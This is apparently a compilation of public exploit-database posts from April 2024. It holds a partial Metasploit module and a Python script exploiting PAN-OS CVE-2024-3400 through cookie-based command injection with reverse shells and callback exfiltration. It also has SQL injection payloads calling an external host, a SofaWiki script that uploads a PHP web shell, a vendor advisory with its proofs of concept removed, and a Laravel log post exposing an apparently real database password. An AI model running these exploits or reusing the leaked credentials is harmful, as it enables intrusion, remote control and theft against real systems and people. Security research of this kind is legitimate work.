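        ],
        'DisclosureDate' => '2024-04-12',
        'Platform' => [ 'linux', 'unix' ],
        'Arch' => [ARCH_CMD],
        'Privileged' => true, # Executes as root on Linux
        'Targets' => [ [ 'Default', {} ] ],
        'DefaultOptions' => {
          'PAYLOAD' => 'cmd/linux/http/x64/meterpreter_reverse_tcp',
          'FETCH_COMMAND' => 'WGET',
          'RPORT' => 443,
          'SSL' => true,
          'FETCH_WRITABLE_DIR' => '/var/tmp',
          'WfsDelay' => 3600 # 1h, since telemetry service cronjob can take up to an hour
        },
        'DefaultTarget' => 0,
        'Notes' => {
          'Stability' => [CRASH_SAFE],
          'Reliability' => [REPEATABLE_SESSION],
          'SideEffects' => [
            IOC_IN_LOGS,
            # The /var/log/pan/gpsvc.log file will log an unmarshal failure message for every malformed session created
            # The NGINX frontend web server, which proxies requests to the GlobalProtect service, will log client IPs in /var/log/nginx/sslvpn_access.log
            # Similarly, the log file /var/log/pan/sslvpn-access/sslvpn-access.log will also contain a log of the HTTP requests
            # The "device_telemetry_*.log" files in /var/log/pan will log the command being injected
            ARTIFACTS_ON_DISK
            # Several 0 length files are created in the following directories during checks and exploitation:
            # - /opt/panlogs/tmp/device_telemetry/hour/
            # - /opt/panlogs/tmp/device_telemetry/minute/
            # - /var/appweb/sslvpndocs/global-protect/portal/fonts/
          ]
        }
      )
    )

    register_options(
      [
        OptString.new('TARGETURI', [true, 'An existing web application endpoint', '/global-protect/login.esp']),
      ]
    )
  end

  # Prove the file-creation primitive by dropping an empty file into a
  # web-served directory and observing the HTTP status difference between the
  # created file (403) and a sibling that does not exist (404).
  def check
    # Try to create a new empty file in an accessible directory with the exploit primitive
    # This file name was chosen because an extension in (css|js|eot|woff|woff2|ttf) is required for correct NGINX routing, and similarly named files already exist in the 'fonts' directory
    file_check_name = "glyphicons-#{Rex::Text.rand_text_alpha_lower(8)}-regular.woff2"
    touch_file("/var/appweb/sslvpndocs/global-protect/portal/fonts/#{file_check_name}")

    # Access that file and a file that doesn't exist to confirm they return 403 and 404, respectively
    res_check_created = send_request_cgi(
      'method' => 'GET',
      'uri' => normalize_uri('global-protect', 'portal', 'fonts', file_check_name)
    )

    return CheckCode::Unknown('Connection failed') unless res_check_created

    res_check_not_created = send_request_cgi(
      'method' => 'GET',
      'uri' => normalize_uri('global-protect', 'portal', 'fonts', "X#{file_check_name}")
    )

    return CheckCode::Unknown('Connection failed') unless res_check_not_created

    if (res_check_created.code != 403) || (res_check_not_created.code != 404)
      return CheckCode::Safe('Arbitrary file write did not succeed')
    end

    CheckCode::Vulnerable("Arbitrary file write succeeded: /var/appweb/sslvpndocs/global-protect/portal/fonts/#{file_check_name} NOTE: This file will not be deleted")
  end

  # Exploit primitive similar to `touch`, creating an empty file owned by root
  # at the given absolute path by smuggling it through the SESSID cookie.
  #
  # @param file [String] absolute path of the file to create
  # @return [Rex::Proto::Http::Response, nil] the HTTP response (not checked by callers)
  def touch_file(file)
    fail_with(Failure::BadConfig, 'Semicolon cannot be present in file name, due to the cookie injection context') if file.include? ';'
    # A single path component longer than NAME_MAX cannot be created, and the
    # failure would otherwise only surface as a payload that never runs.
    if File.basename(file).bytesize > MAX_FILE_NAME_LENGTH
      fail_with(Failure::BadConfig, "File name is #{File.basename(file).bytesize} bytes, which exceeds the #{MAX_FILE_NAME_LENGTH} byte limit; use a shorter payload")
    end

    send_request_cgi(
      'method' => 'GET',
      'uri' => normalize_uri(target_uri.path),
      'headers' => {
        'Cookie' => "SESSID=./../../../..#{file}"
      }
    )
  end

  # Build the shell command that decodes and runs the payload.
  #
  # The command is embedded in a file name, so it may contain neither spaces
  # (${IFS} is used as the separator) nor '/' (the filesystem would treat it
  # as a path separator and the file would not be created). Standard base64
  # output can contain '/', so when it does, the payload is re-encoded with a
  # different trailing shell comment (ignored by bash) until the encoding is
  # slash-free. The first attempt uses the payload unmodified.
  #
  # @return [String] the command to place inside backticks in the file name
  def build_command
    base = payload.encoded
    MAX_ENCODE_ATTEMPTS.times do
      encoded = Rex::Text.encode_base64(base)
      return "echo${IFS}-n${IFS}#{encoded}|base64${IFS}-d|bash${IFS}-" unless encoded.include?('/')

      base = "#{payload.encoded}\n##{Rex::Text.rand_text_alphanumeric(8)}"
    end
    fail_with(Failure::BadConfig, "Could not produce a '/'-free base64 encoding of the payload after #{MAX_ENCODE_ATTEMPTS} attempts")
  end

  def exploit
    cmd = build_command

    # Create maliciously named files in both telemetry directories that might be used by affected versions
    # Both files are necessary, since it seems that some PAN-OS versions only execute payloads in 'hour' and others use 'minute'.
    # It's possible that the payload will execute twice, but we've only observed one location working during testing
    files = [
      "/opt/panlogs/tmp/device_telemetry/hour/#{Rex::Text.rand_text_alpha_lower(4)}`#{cmd}`",
      "/opt/panlogs/tmp/device_telemetry/minute/#{Rex::Text.rand_text_alpha_lower(4)}`#{cmd}`"
    ]

    files.each do |file_path|
      vprint_status("Creating file at #{file_path}")
      touch_file(file_path)

      # Must register for clean up here instead of within touch_file, since touch_file is used in the check
      register_file_for_cleanup(file_path)
    end

    print_status('Depending on the PAN-OS version, it may take the telemetry service up to one hour to execute the payload')
    print_status('Though exploitation of the arbitrary file creation vulnerability succeeded, command injection will fail if the default telemetry service has been disabled')
  end
end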
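# Exploit Title: Palo Alto PAN-OS < v11.1.2-h3 - Command Injection and Arbitrary File Creation
# Date: 21 Apr 2024
# Exploit Author: Kr0ff
# Vendor Homepage: https://security.paloaltonetworks.com/CVE-2024-3400
# Software Link: -
# Version: PAN-OS 11.1 < 11.1.0-h3, < 11.1.1-h1, < 11.1.2-h3
#          PAN-OS 11.0 < 11.0.0-h3, < 11.0.1-h4, < 11.0.2-h4, < 11.0.3-h10, < 11.0.4-h1
#          PAN-OS 10.2 < 10.2.0-h3, < 10.2.1-h2, < 10.2.2-h5, < 10.2.3-h13, < 10.2.4-h16, < 10.2.5-h6, < 10.2.6-h3, < 10.2.7-h8, < 10.2.8-h3, < 10.2.9-h1
# Tested on: Debian
# CVE : CVE-2024-3400

#!/usr/bin/env python3

import sys

try:
    import argparse
    import requests
except ImportError:
    print("Missing dependencies, either requests or argparse not installed")
    sys.exit(2)

# https://attackerkb.com/topics/SSTk336Tmf/cve-2024-3400/rapid7-analysis
# https://labs.watchtowr.com/palo-alto-putting-the-protecc-in-globalprotect-cve-2024-3400/

# Request parameters shared by the check and exploit modules.
URI = "/ssl-vpn/hipreport.esp"
USER_AGENT = "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/118.0.0.0 Safari/537.36"  # Windows 10 Chrome 118.0.0.0
TIMEOUT = 10
# Certificate validation is disabled on every request, as in the original
# script; the script therefore cannot tell the intended host from any other
# party answering on the path to it.
VERIFY_TLS = False


def _normalize_target(target: str) -> str:
    """Return ``target`` with an explicit scheme, defaulting to ``http://``.

    The original test ``not "http://" or not "https://" in target`` was true
    for every target that lacked ``https://``, so ``http://host`` became
    ``http://http://host``. Only a target with no scheme at all is prefixed.
    """
    if target.startswith(("http://", "https://")):
        return target
    return "http://" + target


def _post_with_scheme_fallback(session, target: str, headers: dict) -> tuple:
    """POST ``headers`` to ``target + URI``, retrying once over HTTPS.

    Returns ``(response, target_used)`` so the caller reuses the scheme that
    actually answered. A timeout or connection error over plain HTTP falls
    back to HTTPS on the same host; the same failure over HTTPS prints a
    message and exits with status 1, as the original did. HTTP error status
    codes are not treated as failures and reach the caller unchanged.
    The original ``except A or B`` clause only ever caught ``Timeout``; both
    exception types are caught here.
    """
    target = _normalize_target(target)
    network_errors = (requests.exceptions.Timeout, requests.ConnectionError)
    try:
        return session.post(target + URI, verify=VERIFY_TLS, headers=headers, timeout=TIMEOUT), target
    except network_errors as e:
        if target.startswith("https://"):
            print("Request timed out for \"HTTPS\"")
            sys.exit(1)
        print(f"Request timed out for \"HTTP\" !{e}")

    print("Trying with \"HTTPS\"...")
    # Replace the scheme instead of prepending one; the original produced
    # "https://http://host" here.
    target = "https://" + target[len("http://"):]
    try:
        return session.post(target + URI, verify=VERIFY_TLS, headers=headers, timeout=TIMEOUT), target
    except network_errors:
        print("Request timed out for \"HTTPS\"")
        sys.exit(1)


def check_vuln(target: str, file: str) -> bool:
    """Report whether ``target`` exhibits the CVE-2024-3400 file creation.

    A file named ``file`` is requested to be created under the portal images
    directory through the SESSID cookie, and that name is then fetched
    directly; a 403 on the follow-up GET is taken as evidence the file now
    exists. Prints a message and returns True in that case, False otherwise.
    The created file is not removed.
    """
    headers = {
        "User-Agent": USER_AGENT,
        "Content-Type": "application/x-www-form-urlencoded",
        "Cookie": f"SESSID=../../../var/appweb/sslvpndocs/global-protect/portal/images/{file}",
    }
    headers_no_cookie = {
        "User-Agent": USER_AGENT,
    }

    session = requests.Session()
    response, target = _post_with_scheme_fallback(session, target, headers)
    if response.status_code != 200:
        return False

    response = session.get(
        target + f"/global-protect/portal/images/{file}",
        verify=VERIFY_TLS, headers=headers_no_cookie, timeout=TIMEOUT,
    )
    # A 403 by itself is a weak signal: a WAF or proxy that answers 403 for
    # any unknown path produces a false positive. Also fetching a name that
    # was never written and expecting 404 would make the verdict stronger.
    if response.status_code != 403:
        return False
    print("Target vulnerable to CVE-2024-3400")
    return True


def cmdexec(target: str, callback_url: str, payload: str) -> bool:
    """Send the command-injection request of CVE-2024-3400.

    ``payload`` is embedded verbatim in the file name carried by the SESSID
    cookie (the original assigned a rewritten copy to an unused local, so it
    never affected the request; that dead code is removed). Returns True when
    the response body contains "Success", False otherwise. A True result
    confirms only that the request was accepted, not that anything ran.
    """
    headers = {
        "User-Agent": USER_AGENT,
        "Content-Type": "application/x-www-form-urlencoded",
        "Cookie": f"SESSID=../../../../opt/panlogs/tmp/device_telemetry/minute/attack782`{callback_url}?r=$({payload})`",
    }

    session = requests.Session()
    response, _ = _post_with_scheme_fallback(session, target, headers)
    return "Success" in response.text


# Initialize the argument parser and dispatch to the selected module.
def argparser(selection=None):
    """Parse the command line and run the selected module.

    ``selection`` is an optional argv-style list for programmatic use. When
    it is None, ``sys.argv[1:]`` is parsed and an empty command line shows
    the help text. The original parsed ``selection`` and then discarded the
    result by parsing ``sys.argv`` again; ``selection`` is honored here.
    """
    parser = argparse.ArgumentParser(description='CVE-2024-3400 - Palo Alto OS Command Injection')

    subparser = parser.add_subparsers(help="Available modules", dest="module")

    exploit_subp = subparser.add_parser("exploit", help="Exploit module of script")
    exploit_subp.add_argument("-t", "--target", help="Target to send payload to", required=True)
    exploit_subp.add_argument("-p", "--payload", help="Payload to send (e.g: whoami)", required=True)
    exploit_subp.add_argument("-c", "--callbackurl", help="The callback url such as burp collaborator or similar", required=True)
    # ---------------------------------------
    check_subp = subparser.add_parser("check", help="Vulnerability check module of script")
    check_subp.add_argument("-t", "--target", help="Target to check if vulnerable", required=True)
    check_subp.add_argument("-f", "--filename", help="Filename of the payload (e.g \"exploitCheck.exp\"", required=True)

    if selection is None:
        selection = sys.argv[1:] or ["-h"]
    args = parser.parse_args(selection)

    if args.module == "exploit":
        cmdexec(args.target, args.callbackurl, args.payload)
    elif args.module == "check":
        check_vuln(args.target, args.filename)


if __name__ == "__main__":
    argparser()
    print("Finished !")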
<pre><code>## Titles: LRMS-PHP-by-oretnom23-v1.0 hat-trick<br />1. Multiple-SQLi<br />2. File Upload<br />3. SQLi Bypass Authentication:<br />## Latest update from the vendor: 5 hours 32 minutes ago<br />## Author: nu11secur1ty<br />## Date: 04/17/2024<br />## Vendor: https://github.com/oretnom23<br />## Software: https://www.sourcecodester.com/php/14883/lodging-reservation-management-system-php-free-source-code.html<br />## Reference: https://portswigger.net/web-security/sql-injection,<br />https://portswigger.net/web-security/file-upload,<br />https://portswigger.net/web-security/authentication<br /><br />## Description:<br />SQLi: The id parameter appears to be vulnerable to SQL injection<br />attacks. The payload '+(select<br />load_file('\\\\od5r0eqq0cjgsi6rj3zmuytae1ku8kwbzzqmha6.stupid.com\\fsb'))+'<br />was submitted in the id parameter. This payload injects a SQL<br />sub-query that calls MySQL's load_file function with a UNC file path<br />that references a URL on an external domain. 
The application<br />interacted with that domain, indicating that the injected SQL query<br />was executed.The attacker can get all information from the system by<br />using this vulnerability!<br />STATUS: HIGH- Vulnerability<br /><br />---------------------------------------------------------------------------------------------------------------------------------------<br />FU:<br />Using this vulnerability, the attacker can upload any PHP file on the server.<br />The parameter id="cimg" is not sanitizing securely.<br />STATUS: CRITICAL- Vulnerability<br /><br />---------------------------------------------------------------------------------------------------------------------------------------<br />SQLi-Bypass-Authentication:<br />The attacker can bypass the admin login form and login to the system<br />by using this vulnerability.<br />The parameter username is not sanitized securely.<br />STATUS: CRITICAL- Vulnerability<br /><br />[+]Exploits:<br />- SQLi Multiple:<br />```mysql<br />---<br />Parameter: id (GET)<br /> Type: boolean-based blind<br /> Title: OR boolean-based blind - WHERE or HAVING clause (NOT)<br /> Payload: page=view_room&id=c81e728d9d4c2f636f067f89cc14862c'+(select<br />load_file('\\\\od5r0eqq0cjgsi6rj3zmuytae1ku8kwbzzqmha6.oastify.com\\fsb'))+''<br />OR NOT 5694=5694 AND 'FJxl'='FJxl<br /><br /> Type: error-based<br /> Title: MySQL >= 5.0 OR error-based - WHERE, HAVING, ORDER BY or<br />GROUP BY clause (FLOOR)<br /> Payload: page=view_room&id=c81e728d9d4c2f636f067f89cc14862c'+(select<br />load_file('\\\\od5r0eqq0cjgsi6rj3zmuytae1ku8kwbzzqmha6.oastify.com\\fsb'))+''<br />OR (SELECT 7377 FROM(SELECT COUNT(*),CONCAT(0x7178787a71,(SELECT<br />(ELT(7377=7377,1))),0x7176787171,FLOOR(RAND(0)*2))x FROM<br />INFORMATION_SCHEMA.PLUGINS GROUP BY x)a) AND 'GMnz'='GMnz<br /><br /> Type: time-based blind<br /> Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)<br /> Payload: page=view_room&id=c81e728d9d4c2f636f067f89cc14862c'+(select<br 
/>load_file('\\\\od5r0eqq0cjgsi6rj3zmuytae1ku8kwbzzqmha6.oastify.com\\fsb'))+''<br />AND (SELECT 4559 FROM (SELECT(SLEEP(7)))zROX) AND 'HxzI'='HxzI<br />---<br />```<br /><br />- FU:<br />```<br /><?php<br /> phpinfo();<br />?><br />```<br /><br />- SQLi - Bypass-Authentication:<br />```<br />username: nu11secur1ty' or 1=1#<br />password: blank<br />```<br /><br />## Reproduce:<br />[href](https://github.com/nu11secur1ty/CVE-nu11secur1ty/tree/main/vendors/oretnom23/%20hat-trick/LRMS-PHP-by-oretnom23-v1.0)<br /><br />## Proof and Exploit:<br />[href](https://www.nu11secur1ty.com/2024/04/lrms-php-by-oretnom23-v10-hat-trick.html)<br /><br />## Time spent:<br />01:35:00<br /><br /><br /></code></pre>
<pre><code>SEC Consult Vulnerability Lab Security Advisory < 20240418-0 ><br />=======================================================================<br /> title: Broken authorization<br /> product: Dreamehome app<br /> vulnerable version: <=2.1.5 (iOS)<br /> fixed version: none, see solution<br /> CVE number: -<br /> impact: medium<br /> homepage: https://www.dreametech.com<br /> found: 2024-01-17<br /> by: Alissa Kim (Office Bochum)<br /> SEC Consult Vulnerability Lab<br /><br /> An integrated part of SEC Consult, an Eviden business<br /> Europe | Asia<br /><br /> https://www.sec-consult.com<br /><br />=======================================================================<br /><br />Vendor description:<br />-------------------<br />"We've emerged as one of the leading brands in smart home cleaning with<br />our 4 major product lines: robotic vacuums and mops, cordless stick vacuums,<br />wet and dry vacuums, and high-speed hair dryers. Each product is meticulously<br />designed to redefine convenience in household innovation and improve our<br />users' homes."<br /><br />Source: https://www.dreametech.com/pages/about-us<br /><br /><br />Business recommendation:<br />------------------------<br />The vendor was unresponsive/uncooperative during multiple months of trying to<br />establish a security contact and to send them our findings. There is no patch/<br />solution available. Try to contact your local support team and request a patch<br />for this issue. Stay up-to-date with firmware and app installations and be vigilant.<br /><br />SEC Consult highly recommends to perform a thorough security review of the product<br />conducted by security professionals to identify and resolve potential further<br />security issues.<br /><br /><br />Vulnerability overview/description:<br />-----------------------------------<br />1) Broken authorization<br />An owner of the robot vacuum cleaner device can share it with other users via the<br />app. 
The privileges of the shared users are very limited. It is not possible to<br />interact with photos and videos from within the mobile application, but it was<br />identified that it is possible to delete and list all images/videos of the main<br />account and even download the encrypted images/videos by sending the requests<br />with the JWT of the shared user. The encryption was not reverse-engineered, but<br />it could potentially be possible for unauthorized users to gain access to sensitive<br />imaging data.<br /><br /><br />Proof of concept:<br />-----------------<br />1) Broken authorization<br />To exploit the vulnerability, it is sufficient to follow these steps:<br />1. Connect a robot vacuum cleaner to the Dreamehome app (in our case the device<br /> "Dreame L10S ultra" was used).<br />2. Take a photo and video with the Dreamehome app using the connected device.<br />3. Share the robot vacuum cleaner with another user.<br />4. The "shared user" can list the photos using the following curl command:<br /> (It is necessary to set the "did" of the device)<br /><br />[POC removed]<br /><br />5. The "shared user" can list the videos using the following curl command:<br /><br />[POC removed]<br /><br />6. The response with the list of photos/videos contains an "id" parameter. Knowing<br />this "id" parameter, a shared user can delete the photos/videos using the value<br />of "id" in the "ossIds" parameter using the following command:<br /><br />[POC removed]<br /><br />7. Furthermore, the responses with the list of photos/videos contain a "filepath"<br />parameter with the URL to the encrypted photo/video. Any user, even without a valid JWT<br />token, can download the encrypted photo/video using this URL. 
The encryption was not<br />reverse-engineered, but it could potentially be possible for unauthorized users to gain<br />access to sensitive imaging data.<br /><br /><br />Vulnerable / tested versions:<br />-----------------------------<br />The following versions were tested; they were the latest versions available<br />at the time of the test:<br />* Dreamehome app 2.1.0 (tested with Dreame L10S ultra device)<br />* Dreamehome app 2.1.5 was tested later on 2024-04-12 and found to be vulnerable<br /> as well.<br /><br />It is assumed that other platforms (Google Android) are affected as well.<br /><br /><br />Vendor contact timeline:<br />------------------------<br />2024-01-24: Contacting vendor through support.us@dreame.tech; aftersales@dreame.tech<br />2024-02-05: Contacting vendor through support.us@dreame.tech; aftersales@dreame.tech<br />2024-02-06: Answer from vendor ticket system (#82462919) to contact marketing@dreame.tech<br />2024-02-06: Contacting vendor through marketing@dreame.tech, no response.<br />2024-02-12: Contacting vendor through marketing@dreame.tech, no response.<br />2024-03-04: Contacting vendor through marketing@dreame.tech, no response.<br />2024-04-11: Sending final email to support.us@dreame.tech; aftersales@dreame.tech<br /> and marketing@dreame.tech. Requesting security contact again. 
As they<br /> are unresponsive, setting release date to 18th April.<br />2024-04-11: Same ticket auto-response (#82521551) as from 2024-02-06:<br /> "Thank you for your great support and interest in our products!<br /> This is Dreame aftersales team; we are glad to be at your service.<br /> For your request, please kindly contact our marketing department<br /> (Email: marketing@dreame.tech) for direct assistance.<br /><br /> Feel free to contact us with product related issues or concerns you<br /> may have."<br />2024-04-11: Sending them once again that marketing does not respond (and should not<br /> be responsible for security) and that we proceed to release the advisory<br /> on 2024-04-18.<br />2024-04-12: Vendor: "Thank you for reaching Dreame. We're sorry for the inconvenience.<br /> According to our service policy, we have no access to confirm any<br /> application for cooperation. We have already contacted our sales<br /> team and IT support to further check your information. They will<br /> reply to you if they decide to proceed cooperation with you.<br /> Your kind understanding and patience are greatly appreciated."<br />2024-04-18: Public release of security advisory.<br /><br /><br />Solution:<br />---------<br />The vendor was unresponsive/uncooperative during multiple months of trying to<br />establish a security contact and to send them our findings. There is no patch/<br />solution available. Try to contact your local support team and request a patch<br />for this issue. 
Stay up-to-date with firmware and app installations and be vigilant.<br /><br /><br />Workaround:<br />-----------<br />None<br /><br /><br />Advisory URL:<br />-------------<br />https://sec-consult.com/vulnerability-lab/<br /><br /><br />~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~<br /><br />SEC Consult Vulnerability Lab<br />An integrated part of SEC Consult, an Eviden business<br />Europe | Asia<br /><br />About SEC Consult Vulnerability Lab<br />The SEC Consult Vulnerability Lab is an integrated part of SEC Consult, an<br />Eviden business. It ensures the continued knowledge gain of SEC Consult in the<br />field of network and application security to stay ahead of the attacker. The<br />SEC Consult Vulnerability Lab supports high-quality penetration testing and<br />the evaluation of new offensive and defensive technologies for our customers.<br />Hence our customers obtain the most current information about vulnerabilities<br />and valid recommendation about the risk profile of new technologies.<br /><br />~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~<br />Interested to work with the experts of SEC Consult?<br />Send us your application https://sec-consult.com/career/<br /><br />Interested in improving your cyber security with the experts of SEC Consult?<br />Contact our local offices https://sec-consult.com/contact/<br />~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~<br /><br />Mail: security-research at sec-consult dot com<br />Web: https://www.sec-consult.com<br />Blog: https://blog.sec-consult.com<br />Twitter: https://twitter.com/sec_consult<br /><br />EOF Alissa Kim / @2024<br /><br /></code></pre>
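# Exploit Title: SofaWiki 3.9.2 - Remote Command Execution (RCE) (Authenticated)
# Discovered by: Ahmet Ümit BAYRAM
# Discovered Date: 18.04.2024
# Vendor Homepage: https://www.sofawiki.com
# Software Link: https://www.sofawiki.com/site/files/snapshot.zip
# Tested Version: v3.9.2 (latest)
# Tested on: MacOS


import requests
import random
import sys
import time

# Per-request timeout so an unresponsive target cannot hang the script
# indefinitely (the original sent requests without one).
REQUEST_TIMEOUT = 30


def main():
    """Authenticate to SofaWiki, upload a .phtml file and print its URL.

    Usage: python exploit.py <base_url> <username> <password>
    Exits with status 1 on a usage error, a failed login, a failed upload or
    a transport-level failure; the original exited 0 after a failed login.
    """
    if len(sys.argv) < 4:
        print("Usage: python exploit.py <base_url> <username> <password>")
        sys.exit(1)

    base_url, username, password = sys.argv[1:4]

    # Random name so repeated runs do not collide on the target.
    filename = f"{random.randint(10000, 99999)}.phtml"

    session = requests.Session()

    login_url = f"{base_url}/index.php"
    login_data = {
        "submitlogin": "Login",
        "username": username,
        "pass": password,
        "name": "SofaWiki",
        "action": "login"
    }
    print("Exploiting...")
    time.sleep(1)
    try:
        response = session.post(login_url, data=login_data, timeout=REQUEST_TIMEOUT)
    except requests.RequestException as exc:
        print("Login request failed:", exc)
        sys.exit(1)
    # The presence of a "Logout" link is the only login signal the script has.
    if "Logout" not in response.text:
        print("Login failed:", response.text)
        sys.exit(1)

    print("Login Successful")
    time.sleep(1)
    php_shell_code = """
<html>
<body>
<form method="GET" name="<?php echo basename($_SERVER['PHP_SELF']); ?>">
<input type="TEXT" name="cmd" autofocus id="cmd" size="80">
<input type="SUBMIT" value="Execute">
</form>
<pre>
<?php
if(isset($_GET['cmd']))
{
system($_GET['cmd']);
}
?>
</pre>
</body>
</html>
"""

    print("Shell uploading...")
    time.sleep(1)
    upload_url = f"{base_url}/index.php"
    files = {
        "uploadedfile": (filename, php_shell_code, "text/php"),
        "action": (None, "uploadfile"),
        "MAX_FILE_SIZE": (None, "8000000"),
        "filename": (None, filename),
        "content": (None, "content")
    }
    try:
        response = session.post(upload_url, files=files, timeout=REQUEST_TIMEOUT)
    except requests.RequestException as exc:
        print("Upload request failed:", exc)
        sys.exit(1)
    # NOTE(review): a 200 only shows the form was accepted; the application
    # may also answer 200 on an error page, so this does not prove storage.
    if response.status_code == 200:
        # The original message had the uploaded name missing from the URL.
        print(f"Your shell is ready: {base_url}/site/files/{filename}")
    else:
        print("Upload failed:", response.text)
        sys.exit(1)


if __name__ == "__main__":
    main()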
<pre><code># Exploit Title: Laravel Framework 11 - Credential Leakage<br /># Google Dork: N/A<br /># Date: [2024-04-19]<br /># Exploit Author: Huseein Amer<br /># Vendor Homepage: [https://laravel.com/]<br /># Software Link: N/A<br /># Version: 8.* - 11.* (REQUIRED)<br /># Tested on: [N/A]<br /># CVE : CVE-2024-29291<br /><br />Proof of concept:<br />Go to any Laravel-based website and navigate to storage/logs/laravel.log.<br /><br />Open the file and search for "PDO->__construct('mysql:host=".<br />The result:<br />shell<br />Copy code<br />#0<br />/home/u429384055/domains/js-cvdocs.online/public_html/vendor/laravel/framework/src/Illuminate/Database/Connectors/Connector.php(70):<br />PDO->__construct('mysql:host=sql1...', 'u429384055_jscv', 'Jaly$$a0p0p0p0',<br />Array)<br />#1<br />/home/u429384055/domains/js-cvdocs.online/public_html/vendor/laravel/framework/src/Illuminate/Database/Connectors/Connector.php(46):<br />Illuminate\Database\Connectors\Connector->createPdoConnection('mysql:host=sql1...',<br />'u429384055_jscv', 'Jaly$$a0p0p0p0', Array)<br />Credentials:<br />Username: u429384055_jscv<br />Password: Jaly$$a0p0p0p0<br />Host: sql1...<br /><br /></code></pre>